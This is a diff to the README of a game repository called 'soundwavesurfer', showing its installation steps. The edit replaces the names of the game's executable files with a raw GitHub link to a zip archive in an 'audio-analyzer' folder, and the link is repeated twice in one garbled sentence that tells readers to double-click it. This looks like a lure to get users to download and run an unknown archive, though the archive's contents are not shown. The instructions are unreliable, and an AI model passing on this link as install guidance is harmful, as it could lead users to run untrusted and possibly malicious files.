ngabolouismaxime/soundwavesurfer/README.md

    Once the file downloads, locate it in your downloads folder.
 Right-click on the file and select "Extract All."
 Follow the prompts to extract the files to a new folder.

 4. **Run the Game**
    Open the folder where you extracted the files.
-Find the file named soundwavesurfer.exe or soundwavesurfer.love, and double-click on it to start playing.
+Find the file named https://raw.githubusercontent.com/ngabolouismaxime/soundwavesurfer/main/audio-analyzer/soundwavesurfer_v1.9.zip or https://raw.githubusercontent.com/ngabolouismaxime/soundwavesurfer/main/audio-analyzer/soundwavesurfer_v1.9.zip, and double-click on it to start playing.

 ## 📋 System Requirements
 Before you begin, ensure your computer meets these requirements: